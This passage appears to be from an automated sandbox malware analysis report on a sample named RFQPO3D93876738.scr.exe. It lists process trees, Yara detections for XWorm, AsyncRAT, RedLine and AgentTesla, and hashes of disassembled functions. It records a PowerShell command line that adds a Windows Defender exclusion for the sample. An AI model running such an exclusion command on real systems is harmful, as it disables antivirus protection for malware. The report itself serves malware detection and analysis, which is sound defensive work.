MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:52:07
Start date:	22/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQPO3D93876738.scr.exe" -Force
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:52:07
Start date:	22/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:52:08
Start date:	22/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xb00000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:52:08
Start date:	22/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7368 -s 1044
Imagebase:	0x7ff637e50000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:52:11
Start date:	22/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC560000 Relevance: 7.4, Strings: 4, Instructions: 2418COMMON

Download Yara Rule

Strings

3>, xrefs: 00007FFAAC560BA0
3>, xrefs: 00007FFAAC560BB2
3>, xrefs: 00007FFAAC560AF2
3>, xrefs: 00007FFAAC5607E5

Memory Dump Source

Source File: 00000000.00000002.1559856484.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac560000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: 3>$3>$3>$3>
API String ID: 0-1504273434
Opcode ID: b60c86282ec48df4e69c52c633e5807a8e2a8b807189399fdb96da18b5952130
Instruction ID: 31d889c3b4fd96a13d9a45209e2728f9f297728c1c9c298bc83a9bad24c66401
Opcode Fuzzy Hash: b60c86282ec48df4e69c52c633e5807a8e2a8b807189399fdb96da18b5952130
Instruction Fuzzy Hash: 8EF2F47184E7C68FF756DB2888555A5BFE4EF93300B0D45FAE08DCB093DA28A849C785

Function 00007FFAAC48D805 Relevance: 3.8, Strings: 1, Instructions: 2545COMMON

Download Yara Rule

Strings

7N_L, xrefs: 00007FFAAC48ED6D

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: 7N_L
API String ID: 0-1962275822
Opcode ID: 3620b285c954920825172890ff6ecb65dfbd20bf64ae3be149bd9abf886a35b0
Instruction ID: 288343c5b13d9f286d067302291f9ffed91b23530ca10196bf68324041943839
Opcode Fuzzy Hash: 3620b285c954920825172890ff6ecb65dfbd20bf64ae3be149bd9abf886a35b0
Instruction Fuzzy Hash: A803673060DB468FE359DB28C4854B5B7E2FF86305B0485BEE49EC7296DE34E94AC781

Function 00007FFAAC481A88 Relevance: 3.2, Strings: 2, Instructions: 736
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFAAC48422F
N_H, xrefs: 00007FFAAC4842DF

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: d$N_H
API String ID: 0-2949440641
Opcode ID: ad6f9dba72efa23ceb392b4951c519a4dd0ca09cf5fcc01c51582d81cb6ae281
Instruction ID: f0db5dc1008e6080e44ce94108b99ff200bb7ccb401e87733a8a5bbdadea3de9
Opcode Fuzzy Hash: ad6f9dba72efa23ceb392b4951c519a4dd0ca09cf5fcc01c51582d81cb6ae281
Instruction Fuzzy Hash: FF226330A1DA498FF348DB38D4995B177E0EF52318B1482BAD4AEC7197DE28E84787C5

Function 00007FFAAC487BE0 Relevance: 2.2, Strings: 1, Instructions: 924
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Y_L, xrefs: 00007FFAAC48C7CE

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: \Y_L
API String ID: 0-2176529945
Opcode ID: 3cb0f1047d7fc6d88bedb50e2f5cb848c3c07d48b1c23cdf36ede4ca1049052d
Instruction ID: 697a723775b245a377ffa007c94c9315728f9e5651fd582fa76c2cf2464712aa
Opcode Fuzzy Hash: 3cb0f1047d7fc6d88bedb50e2f5cb848c3c07d48b1c23cdf36ede4ca1049052d
Instruction Fuzzy Hash: C8524731A0DA098FEB68DB2CC459A7977E1FF5A304F1440BEE45EC3292DE24ED468785

Function 00007FFAAC483AC0 Relevance: 1.7, Strings: 1, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFAAC483B30

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: 2ac966139edd21f5e34adf8940461c080af8e22f1e002fe1e8adfe0cd9d09535
Instruction ID: 23f650f238f88680d0be54b567e7770f28b2b56a103d877221d71cf6f644ce2d
Opcode Fuzzy Hash: 2ac966139edd21f5e34adf8940461c080af8e22f1e002fe1e8adfe0cd9d09535
Instruction Fuzzy Hash: A0D13771A1DA8A4FF75CA73CD8595B977D1EF96214B0481BEE08FC3192DD18E80683C5

Function 00007FFAAC483970 Relevance: 1.1, Instructions: 1133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a5983110566c93b2069acf048333528eeb4571acc61153a1d180a7f491e683
Instruction ID: 0240357a5b0927d6fb4b4b917948a77cf89fdbb4ef908ef9dea2701c40425f1f
Opcode Fuzzy Hash: 08a5983110566c93b2069acf048333528eeb4571acc61153a1d180a7f491e683
Instruction Fuzzy Hash: 8982463190E7968FF7198B2484496B47BE1EF92318F14C1BDD48E875D3DA2EE84AC784

Function 00007FFAAC481A90 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8c407ce6f324ec92acc1fc07db044351b113d9349e7c23e740f5953192b3f2
Instruction ID: 65d993616469765bbe39b5fc54969b04b641633db987a787b1eb98b37209841f
Opcode Fuzzy Hash: dc8c407ce6f324ec92acc1fc07db044351b113d9349e7c23e740f5953192b3f2
Instruction Fuzzy Hash: A3121334909A0A8FFB98DB18C4945F977E1FF86318F1481BDD45EC7586DA28E98AC7C0

Function 00007FFAAC48F090 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5f848ce1c0eb6f082c5f77e6187d1a533be0cc5e53944756b8e21b46725e83
Instruction ID: e51ac6ce9bfa2f81218b31095071917fef490d0ca7d4a59bfb30ae5a08ca8f54
Opcode Fuzzy Hash: 6c5f848ce1c0eb6f082c5f77e6187d1a533be0cc5e53944756b8e21b46725e83
Instruction Fuzzy Hash: 1312177190DA498FF794EB6CC85A7B87BE1FF5A314F0481F9D04DC7652CA28AC4A8781

Function 00007FFAAC48AF80 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2169493b9bbab31251c1e27863e53fb69cd9dc56be3412dd56c35ed62dbc00e
Instruction ID: 85713b294162478e4b21660bd0353946e6b4d07ff27113ed6101f4ec9817ce1b
Opcode Fuzzy Hash: d2169493b9bbab31251c1e27863e53fb69cd9dc56be3412dd56c35ed62dbc00e
Instruction Fuzzy Hash: 1AD1993051DB858FE31CCB29889917577E2FFC6305B04867ED4EAC32A1DA28E50A87C5

Function 00007FFAAC48F2B8 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227982baf0c99c81929e04bb5981c259db68079d1ad456533cad7f49ccc211a0
Instruction ID: 57b005715c00ca72bac2a3a72e8cf0e78c199bb6033f190a2889ba697a6e51b9
Opcode Fuzzy Hash: 227982baf0c99c81929e04bb5981c259db68079d1ad456533cad7f49ccc211a0
Instruction Fuzzy Hash: 28A19271918A5C8FEB54EB6CC859BECBBF1FF59300F0440AAD04DD7292CA34A886CB40

Function 00007FFAAC493F39 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9525da8bdbb4f75e4ccebf83bd5b336e3b9e9742bcc49f7eafaca56240d14f8d
Instruction ID: 08bc0ac7fcbe7d371934aabe856be4fe7efed01c8edefe901e9a79055ce02ba0
Opcode Fuzzy Hash: 9525da8bdbb4f75e4ccebf83bd5b336e3b9e9742bcc49f7eafaca56240d14f8d
Instruction Fuzzy Hash: 76512871A0D7594FE71D9B3888591757BE1EB87320B05C2BFD48BC7297DD28A80A83C6

Function 00007FFAAC48291A Relevance: 1.6, APIs: 1, Instructions: 136
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC4829F1

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4bacac7f65472a205a6ba948eeff9ee57ec8c7939ef19585c1318499d5d3327d
Instruction ID: 36fdcc142e5d3f349958711023d40feb4b540fd8bb7ac9377354c244f119df52
Opcode Fuzzy Hash: 4bacac7f65472a205a6ba948eeff9ee57ec8c7939ef19585c1318499d5d3327d
Instruction Fuzzy Hash: CD413B3090DB888FD719DB6898066F97FF0EF66321F04426FD089C31A3CB646456C795

Function 00007FFAAC497879 Relevance: 1.6, APIs: 1, Instructions: 118
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC497921

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ecee417c1a7d46f6ca7c8ae8202c2817060ce25a1f807bbeae6ade6c51a00e60
Instruction ID: bb8f72c29584bc44d81bd1e48086bcc12586b54615bd84a99e7052ca52247ee0
Opcode Fuzzy Hash: ecee417c1a7d46f6ca7c8ae8202c2817060ce25a1f807bbeae6ade6c51a00e60
Instruction Fuzzy Hash: 3B31D43190CB5C8FDB18DBA8D8496F9BBF1EB95321F04426FD049C3252DB65A846C781

Function 00007FFAAC480911 Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocConsole.KERNELBASE ref: 00007FFAAC4809AF

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID: AllocConsole
String ID:
API String ID: 4167703944-0
Opcode ID: 5dfb78618f18a7fd5cfc6c6cc4bb388bed51d5182e5b3da6849cf197e2f22724
Instruction ID: 96c5d114915b354a37cf5789b5a7fb3a3549a4ab03ba97b3e6c5df19ee03bd40
Opcode Fuzzy Hash: 5dfb78618f18a7fd5cfc6c6cc4bb388bed51d5182e5b3da6849cf197e2f22724
Instruction Fuzzy Hash: 7931907190C7488FDB15DFA8D849AEABBF4EF56320F04826ED089C3562C764A54ACB51

Function 00007FFAAC488B72 Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC497921

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d52d99c7a01a8043997f3b12d0f970f4c7c2dc73854f6ecee210a4cbff864da1
Instruction ID: 4cb1865004ef92962fc4e8edbc54385f24262d533bc9dacb3f56977ba215dda6
Opcode Fuzzy Hash: d52d99c7a01a8043997f3b12d0f970f4c7c2dc73854f6ecee210a4cbff864da1
Instruction Fuzzy Hash: 5931D63090CA1C8FDB18DF98D8496F9BBE1FB95321F00422FD04AD3251CB70A8468B95

Function 00007FFAAC5610C9 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559856484.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac560000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 419ae03d879be5bd887feb08fb2c555511829d3cd169138a2ac64ba7416ec4e0
Instruction ID: ab386950c8b539c85344c2c1a46ed0685fab31ce2d41129a050cea635983bb27
Opcode Fuzzy Hash: 419ae03d879be5bd887feb08fb2c555511829d3cd169138a2ac64ba7416ec4e0
Instruction Fuzzy Hash: 0281F871D4D78A8FE756DB28C8555B6BBF4EF56300B0981BAE04EC7193DA28A809C3C1

Function 00007FFAAC561210 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559856484.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac560000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a13e397c116ad326a4b312bea188153d03cee2c96d771a60b0f9e9aa4f7c270
Instruction ID: 3be098f58c6933dceae13596aa987f1a10b892c3b939b55297d59a6ed2c526cd
Opcode Fuzzy Hash: 6a13e397c116ad326a4b312bea188153d03cee2c96d771a60b0f9e9aa4f7c270
Instruction Fuzzy Hash: D931F131E09A4E8FFB58DB18C8465BAB7E4FF55300B08467AE00ED3585DA24E805C7C0

Non-executed Functions

Function 00007FFAAC493809 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFAAC493876

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 719a077f1ea8422912cd0da058b6a8504fb163147398226bee561eb19c2d2889
Instruction ID: d460d82fcc1f601b5a9d2fcd91cbd92f2d985f00ed4d1ff55a38e13cf836de9c
Opcode Fuzzy Hash: 719a077f1ea8422912cd0da058b6a8504fb163147398226bee561eb19c2d2889
Instruction Fuzzy Hash: D151373250D3954FD31E863D9C564A17FA6DB87220719C2ABE4C6CB2A7E819AC1BC3D1

Function 00007FFAAC496E15 Relevance: .9, Instructions: 887COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1559263125.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac480000_RFQPO3D93876738.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0311c7c8c9300dec3fcaac4873564ca2c26ccc3bf05a9edaf2aa845ec673afab
Instruction ID: 62da4a345242c52a07fe7864a1554bdd68d81e222d9aa07e8b984ad85defc0c7
Opcode Fuzzy Hash: 0311c7c8c9300dec3fcaac4873564ca2c26ccc3bf05a9edaf2aa845ec673afab
Instruction Fuzzy Hash: C742573150EB56CFF359DB2484594A177E1FF92318B1485BED08EC7292EE2AE84AC7C1

Analysis Process: AddInProcess32.exePID: 7660, Parent PID: 7368COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	99.5%
Signature Coverage:	0%
Total number of Nodes:	619
Total number of Limit Nodes:	50

Executed Functions

Function 07DBC070 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 07DBC76F
$q, xrefs: 07DBC7C8
$q, xrefs: 07DBC7BC
$q, xrefs: 07DBC7A4
$q, xrefs: 07DBC77B
$q, xrefs: 07DBC798

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 5fcf5de1d9294c31dcf3062c88cb5d2d49d2a9a80353e0f466d8d881f567ee0b
Instruction ID: 0ed6b63ca59d9971ec6f9e0894a55b4545463834eff7c7a54416b30b99738b13
Opcode Fuzzy Hash: 5fcf5de1d9294c31dcf3062c88cb5d2d49d2a9a80353e0f466d8d881f567ee0b
Instruction Fuzzy Hash: DD322E75E10719CBCB24DF79D85069DF7B2FF89301F2096A9D44AA7214EB30AD85CB90

Function 07DD7E60 Relevance: 3.0, Strings: 2, Instructions: 474COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD83FB
$q, xrefs: 07DD8407

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 9ece2141a9cc70aec82d8d5b36d466d20dfafcaca1394bc7cd4c809d4de86467
Instruction ID: c260467f54e93aac29288e42a603866b87ceb4f4cf524f645b7eea038af1be00
Opcode Fuzzy Hash: 9ece2141a9cc70aec82d8d5b36d466d20dfafcaca1394bc7cd4c809d4de86467
Instruction Fuzzy Hash: 5E02BEB0B002169FDB15DB69D890BAEBBE2FF84311F158569D405DB384DB35EC86CB90

Function 07DDBFD3 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

t]Zj, xrefs: 07DDC3A8

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: t]Zj
API String ID: 0-1280207020
Opcode ID: 3ac58bd3a247af6adf180d60d0029f85cc9d2ebacc6f95727b56178298a667e2
Instruction ID: 63b9202521237cf2f60cba6ee17cf472ea741718a90047155bb1c84045216fd5
Opcode Fuzzy Hash: 3ac58bd3a247af6adf180d60d0029f85cc9d2ebacc6f95727b56178298a667e2
Instruction Fuzzy Hash: A73282B4B002059FDB24DB68D4947AEBBB6FF89310F108529E40ADB395DB35EC46CB61

Function 07DBB248 Relevance: 1.1, Instructions: 1057COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05914dc905e9b5325bfd7c0d1c02a6dcb69f79c3de88fc88cfc87dbf6127d05
Instruction ID: 953865bb0c2452a3add2b7afcbfd119793f1dd72b892e96f1a56b8c37ab304fd
Opcode Fuzzy Hash: b05914dc905e9b5325bfd7c0d1c02a6dcb69f79c3de88fc88cfc87dbf6127d05
Instruction Fuzzy Hash: 3AA212B4A00205CFDB24CB68C594B9DFBF2FB49314F5484AAD44AAB361DB35EC85CB91

Function 07DBE1A8 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d7bf4438655366c907d61ce9cb1fee4e559522de402699832429c2cc053b1b
Instruction ID: bbb752928e7ccfe655ccc2bb1264506628287960465a53d30a088ad4d507c229
Opcode Fuzzy Hash: 47d7bf4438655366c907d61ce9cb1fee4e559522de402699832429c2cc053b1b
Instruction Fuzzy Hash: CE22BEB5E00215DBDB34DB68C8806EEFBB2FF85310F24856AD8569B385DA35EC45CB90

Function 07DBF090 Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b51da411d29d8c6e6f0156583202187f74492bb60c926eb3c487005141bd98a7
Instruction ID: 07d20bfa0550cc73bb87bd659b2a18c6923db4f48d8a48c76e5faad829a1ed24
Opcode Fuzzy Hash: b51da411d29d8c6e6f0156583202187f74492bb60c926eb3c487005141bd98a7
Instruction Fuzzy Hash: 5AE1AEB4A04211CFDB24DF68D484BAEF7F1BF89310F1580A9D84AAB341DA79DC45CBA1

Function 07DD03CC Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 511d366adf010d32d09c9cef4e3b0f9fc6e6789d50623a721978a2ec57bcad68
Instruction ID: bdf5df35972dbf7d1ba198ff21706a0229128f38ec08f94ec6226793821391d0
Opcode Fuzzy Hash: 511d366adf010d32d09c9cef4e3b0f9fc6e6789d50623a721978a2ec57bcad68
Instruction Fuzzy Hash: BCD19F71A002069FCB15CF69D984AAEBBF6FF89300F158569E405E7361DB34EC52CBA1

Function 07DDADB8 Relevance: 10.4, Strings: 8, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 07DDAF84
$q, xrefs: 07DDAF2C
$q, xrefs: 07DDAF5B
$q, xrefs: 07DDAF90
$q, xrefs: 07DDAF67
$q, xrefs: 07DDAEE5
$q, xrefs: 07DDAED9
$q, xrefs: 07DDAF38

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: a1e396c90b5be6e40bef548ac132193010f0a2da46af7f11e5b0a71e5b6a553f
Instruction ID: c30e26c10b57f44c98f81df80f0f280b712eb889d2ca805eb2c999c2bb48f3f5
Opcode Fuzzy Hash: a1e396c90b5be6e40bef548ac132193010f0a2da46af7f11e5b0a71e5b6a553f
